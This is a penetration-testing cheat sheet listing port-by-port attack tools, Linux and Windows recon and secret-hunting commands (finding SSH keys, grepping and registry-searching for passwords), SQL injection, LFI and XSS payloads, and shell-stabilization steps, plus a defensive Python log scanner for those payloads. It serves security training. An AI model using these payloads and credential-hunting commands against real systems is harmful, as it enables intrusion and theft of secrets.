# Cheatsheets

> **"Memorizing is useless. Having good notes is vital."**

## 🌐 Common Ports & Services (Quick Reference)

| Port        | Service  | Tool / Command                            |
| ----------- | -------- | ----------------------------------------- |
| **21**      | FTP      | `ftp <IP>` (Anonymous?)                   |
| **22**      | SSH      | `ssh user@<IP>` / `hydra`                 |
| **23**      | Telnet   | `telnet <IP>` (Sniffing?)                 |
| **25**      | SMTP     | `nc <IP> 25` (VRFY/EXPN)                  |
| **53**      | DNS      | `dig axfr @<IP>` (Zone Transfer)          |
| **80/443**  | HTTP/S   | `whatweb`, `feroxbuster`, `nuclei`        |
| **88**      | Kerberos | `kerbrute`, `impacket-GetUserSPNs`        |
| **139/445** | SMB      | `enum4linux`, `crackmapexec`, `smbclient` |
| **389/636** | LDAP     | `ldapsearch`, `windapsearch`              |
| **1433**    | MSSQL    | `impacket-mssqlclient`                    |
| **3306**    | MySQL    | `mysql -u root -h <IP>`                   |
| **3389**    | RDP      | `xfreerdp /u:user /p:pass /v:<IP>`        |
| **5985**    | WinRM    | `evil-winrm -i <IP>`                      |

## 🐧 Linux Quick Recon

### System & Users

```bash
uname -a; cat /etc/issue; cat /etc/*-release
grep 'sh$' /etc/passwd  # users with a login shell
lastlog | grep -v "Never"
w; whoami; id
```

### Network

```bash
ip a; ip route; cat /etc/hosts
netstat -antup | grep LISTEN
ss -lntu
```

### Finding Secrets

```bash
grep -Ur "password" /var/www/html 2>/dev/null
find / -name "id_rsa" 2>/dev/null
history | grep "ssh"
env
```

## 🏰 Windows Quick Recon

### System & Users

```cmd
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
whoami /priv
net user <username>
net localgroup administrators
```

### Network

```cmd
ipconfig /all
netstat -ano | findstr LISTEN
type C:\Windows\System32\drivers\etc\hosts
```

### Finding Secrets

```cmd
findstr /si password *.txt *.ini *.xml *.config
reg query HKLM /f password /t REG_SZ /s
```

## 🕸️ Web Attacks One-Liners

### SQL Injection (Auth Bypass)

* `' OR 1=1-- -`
* `admin' --`
* `" OR "" = "`

### LFI (Local File Inclusion)

* `../../../../etc/passwd`
* `....//....//....//etc/passwd`
* `php://filter/convert.base64-encode/resource=index.php`

### XSS (Cross-Site Scripting)

* `<script>alert(1)</script>`
* `<img src=x onerror=alert(1)>`
* `<svg/onload=alert(1)>`
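A defender-side complement to the LFI and XSS lists above: this added Python example (not from the original page) scans constructed web-server access-log lines for the listed payloads, URL-decoding each request target and collapsing the `....//` variant that survives a naive `../` strip before matching. The log lines and the `classify`/`scan_log` helpers are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real server) exercising
# the LFI and XSS payloads listed above plus one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1024
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=....//....//....//etc/passwd HTTP/1.1" 200 1024
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=%3Csvg%2Fonload%3Dalert%281%29%3E HTTP/1.1" 200 300
"""

# Common Log Format: client, identd, user, [timestamp], "METHOD target PROTO", status
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalize(target):
    """URL-decode until stable (double encoding), then collapse '....//' to '../'."""
    prev, cur = None, target
    while cur != prev:                      # repeat: %252e -> %2e -> .
        prev, cur = cur, unquote(cur)
    prev = None
    while cur != prev:                      # '....//' becomes '../' once a filter strips one '../'
        prev, cur = cur, cur.replace("....//", "../")
    return cur

def classify(target):
    """Return the list of payload classes seen in one request target."""
    t = normalize(target).lower()
    findings = []
    if "../" in t or "..\\" in t:
        findings.append("path-traversal")
    if "php://" in t:                       # php://filter wrapper from the LFI list
        findings.append("php-wrapper")
    if re.search(r"<script|onerror\s*=|onload\s*=|<svg", t):
        findings.append("xss")
    return findings

def scan_log(text):
    """Parse each log line and report requests carrying a listed payload."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        tags = classify(m["target"])
        if tags:
            hits.append({"ip": m["ip"], "target": m["target"], "tags": tags})
    return hits
```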

## ⌨️ TTY Stabilization (Full Interactive Shell)

1. **Python**: `python3 -c 'import pty; pty.spawn("/bin/bash")'`
2. **Background**: `Ctrl + Z`
3. **Stty**: `stty raw -echo; fg`
4. **Reset**: `export TERM=xterm`

## 🔗 Top Resources

* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
* [HackTricks](https://book.hacktricks.xyz/)
* [GTFOBins](https://gtfobins.github.io/) / [LOLBAS](https://lolbas-project.github.io/)
* [RevShells.com](https://www.revshells.com/) - Online reverse shell generator.
